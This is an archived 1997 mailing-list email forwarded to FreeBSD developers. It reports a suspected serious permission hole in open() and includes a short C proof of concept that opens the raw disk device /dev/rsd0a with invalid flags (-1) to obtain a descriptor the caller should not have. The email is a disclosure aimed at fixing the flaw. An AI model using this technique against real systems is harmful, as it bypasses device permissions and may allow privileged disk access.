From owner-freebsd-hackers  Tue Oct 21 19:14:38 1997
Return-Path: <owner-freebsd-hackers>
Received: (from root@localhost)
          by hub.freebsd.org (8.8.7/8.8.7) id TAA26593
          for hackers-outgoing; Tue, 21 Oct 1997 19:14:38 -0700 (PDT)
          (envelope-from owner-freebsd-hackers)
Received: from plum.cyber.com.au (plum.cyber.com.au [203.7.155.24])
          by hub.freebsd.org (8.8.7/8.8.7) with SMTP id TAA26575
          for <hackers@freebsd.org>; Tue, 21 Oct 1997 19:14:25 -0700 (PDT)
          (envelope-from darrenr@cyber.com.au)
Received: (from darrenr@localhost) by plum.cyber.com.au (8.6.12/8.6.6) id MAA01798 for hackers@freebsd.org; Wed, 22 Oct 1997 12:14:23 +1000
Received: from satay.cyber.com.au (satay.cyber.com.au [203.7.155.20]) by plum.cyber.com.au (8.6.12/8.6.6) with ESMTP id GAA29580 for <darrenr@cyber.com.au>; Sat, 18 Oct 1997 06:17:55 +1000
Received: (from uucp@localhost) by satay.cyber.com.au (8.7.4/8.7.3) id GAA18029 for <darrenr@cyber.com.au>; Sat, 18 Oct 1997 06:14:40 +1000 (EST)
Received: from homeworld.cygnus.com(205.180.83.70) by satay.cyber.com.au via smap (V1.3)
	id sma018025; Sat Oct 18 06:14:22 1997
Received: (qmail 5136 invoked by uid 1110); 17 Oct 1997 10:45:20 -0000
Delivered-To: darrenr@netbsd.org
Received: (qmail 4659 invoked by uid 605); 17 Oct 1997 10:43:25 -0000
Received: (qmail 4619 invoked by alias); 17 Oct 1997 10:43:12 -0000
Delivered-To: developers@netbsd.org
Received: (qmail 4605 invoked from network); 17 Oct 1997 10:43:10 -0000
Received: from kechara.flame.org (192.80.44.209)
  by homeworld.cygnus.com with SMTP; 17 Oct 1997 10:43:10 -0000
Received: (qmail 11041 invoked by uid 173); 17 Oct 1997 10:42:13 -0000
Date: 17 Oct 1997 10:42:13 -0000
Message-ID: <19971017104213.11040.qmail@kechara.flame.org>
From: explorer@flame.org
To: developers@NetBSD.ORG
Subject: Possible SERIOUS bug in open()?
Delivered-To: netbsd-developers@NetBSD.ORG
Sender: owner-freebsd-hackers@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

This was sent to me recently...  It seems to be a pretty serious hole
in open() and permissions...

Note, in the following, open() succeeds, and ioctls are probably
executed...

/*
 * This will give you a file descriptor on a device you should not have
 * access to.  This seems really, really screwed up, since holding a fd
 * lets you do a lot of ioctls that you should not be able to do...
 */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>

int
main(int argc, char **argv)
{
  int fd;

  fd = open("/dev/rsd0a", -1, 0);

  if (fd < 0)
    err(1, "open");
}